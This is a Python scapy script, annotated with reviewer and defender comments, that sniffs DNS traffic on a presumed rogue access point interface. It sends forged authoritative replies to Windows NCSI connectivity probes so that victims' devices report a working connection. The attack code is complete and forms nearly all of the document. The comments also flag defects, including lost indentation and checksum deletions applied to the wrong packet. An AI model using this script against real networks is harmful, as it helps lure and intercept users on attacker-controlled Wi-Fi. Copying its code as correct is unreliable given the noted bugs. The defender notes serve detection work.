- from scapy.all import *
# Work out which directory this script lives in and report it.
# NOTE(review): `os` is never imported by name; presumably it arrives through
# the `from scapy.all import *` star import -- confirm.
DIR = os.path.dirname(os.path.abspath(__file__))
print('Executed from ' + DIR + '\n')
# The capture and injection interface is hard-coded as at0 in the rest of the script.
print('Assuming interface at0')
def FakeAccess2(pkt):
    """Sniff callback that answers NCSI DNS probes seen on at0 with forged records.

    sniff() hands every captured packet to this function. For A (qtype 1) and
    AAAA (qtype 28) questions whose name contains 'msftncsi', it builds a reply
    by swapping the Ethernet, IP and UDP source/destination fields of the
    query, copying the DNS transaction id and question section, attaching one
    hard-coded answer record, and transmitting the result with sendp() on at0.
    Nothing is returned.

    NOTE(review): the paste lost its indentation. The nesting below is
    reconstructed from the log messages and branch order and must be checked
    against the original file, in particular which `if` each `else` belongs to.

    Defender notes, limited to what this code shows: the forged replies carry
    the authoritative-answer flag (aa=1) and a fixed TTL of 64, and they map
    www.msftncsi.com to 10.0.0.254 (A) or to a link-local fe80:: address
    (AAAA). A sensor or client check that compares answers for these probe
    names with their expected public values would flag them. Only clients
    already attached to the at0 segment are reachable, presumably a rogue
    access point (TODO confirm), so keeping clients off untrusted SSIDs is the
    primary control, and the OS "connected" indicator should not be read as
    evidence that a network is trustworthy.
    """
    # Use the first element of what sniff() delivered.
    pkt=pkt[0]
    # Only packets carrying a DNS question record are processed.
    if pkt.haslayer(DNSQR):
        print('Packet with DNSQR layer found.')
        # qtype 1 is an A (IPv4 address) question.
        if pkt[DNS].qd.qtype == 1:
            print('DNSQR type appears type = A')
            # Substring match, not an exact name comparison: any queried name
            # containing both 'dns' and 'msftncsi' takes this branch.
            if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
                # Author's note: this probe must be answered with the genuine value.
                print('It appears captured DNS request requests dns.msftncsi.com')
                # Reply mirrors the query's addressing; qr=1 marks a response and
                # aa=1 claims an authoritative answer.
                spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
                IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='131.107.255.255'))
                # NOTE(review): these deletions act on the captured `pkt`,
                # not on `spoofed_pkt`.
                del pkt[IP].chksum
                del pkt[UDP].chksum
                sendp(spoofed_pkt,iface='at0')
                print('Spoofed response send:')
                spoofed_pkt.show2()
            # A plain `if`, not `elif`: it is evaluated even when the branch
            # above already matched.
            if 'www' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
                # Author's note: must point to the server holding ncsi.txt; do the same for IPv6.
                print('It appears captured DNS request requests www.msftncsi.com')
                spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
                IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                # Author's note: 10.0.0.254 must be the gateway configured for DHCP.
                an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=64, rdata='10.0.0.254'))
                # NOTE(review): acts on the captured `pkt`, not on `spoofed_pkt`.
                del pkt[IP].chksum
                del pkt[UDP].chksum
                sendp(spoofed_pkt,iface='at0')
                print('Spoofed response send:')
                spoofed_pkt.show2()
            # NOTE(review): presumably paired with the 'www' test above; if so,
            # this message is also printed for names that matched the 'dns' branch.
            else:
                print('Wrong DNS.qd.qname :'+pkt[DNS].qd.qname)
        # qtype 28 is an AAAA (IPv6 address) question. The reply is still built
        # on the query's IP layer (pkt[IP]).
        if pkt[DNS].qd.qtype == 28:
            print('DNSQR type appears type = AAAA')
            if 'dns' in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
                # Author's note: this probe must be answered with the genuine value.
                print('AAAA DNS request for dns.msftncsi.com found, loop works')
                spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
                IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fd3e:4f5a:5b81::1'))
                # NOTE(review): acts on the captured `pkt`, not on `spoofed_pkt`.
                del pkt[IP].chksum
                del pkt[UDP].chksum
                sendp(spoofed_pkt,iface='at0')
                print('Spoofed response send:')
                spoofed_pkt.show2()
            # Every other name containing 'msftncsi' lands here, not only
            # www.msftncsi.com as the log message suggests.
            if 'dns' not in pkt[DNS].qd.qname and 'msftncsi' in pkt[DNS].qd.qname:
                # Author's note: this probe must be answered with the genuine value.
                print('AAAA DNS request for www.msftncsi.com found, loop works')
                spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether].type)/\
                IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
                an=DNSRR(rrname=pkt[DNS].qd.qname, type=28, ttl=64, rdata='fe80::ea94:f6ff:fe24:d147'))
                # Author's note: the rdata is the IPv6 address of at0.
                # NOTE(review): the deletions below act on the captured `pkt`,
                # not on `spoofed_pkt`.
                del pkt[IP].chksum
                del pkt[UDP].chksum
                sendp(spoofed_pkt,iface='at0')
                print('Spoofed response send:')
                spoofed_pkt.show2()
    # NOTE(review): presumably paired with the haslayer(DNSQR) test, going by
    # the message text.
    else:
        print('Captured packet has no DNSQR')
# Announce the start of capture, then sniff on at0 with no packet limit.
print('Sniffing...')
# The BPF filter restricts capture to traffic addressed to port 53 (TCP or UDP).
# count=0 means no limit, store=0 keeps no packets in memory, and each captured
# packet is passed to FakeAccess2.
sniff(iface='at0', filter='dst port 53', prn=FakeAccess2, count=0, store=0)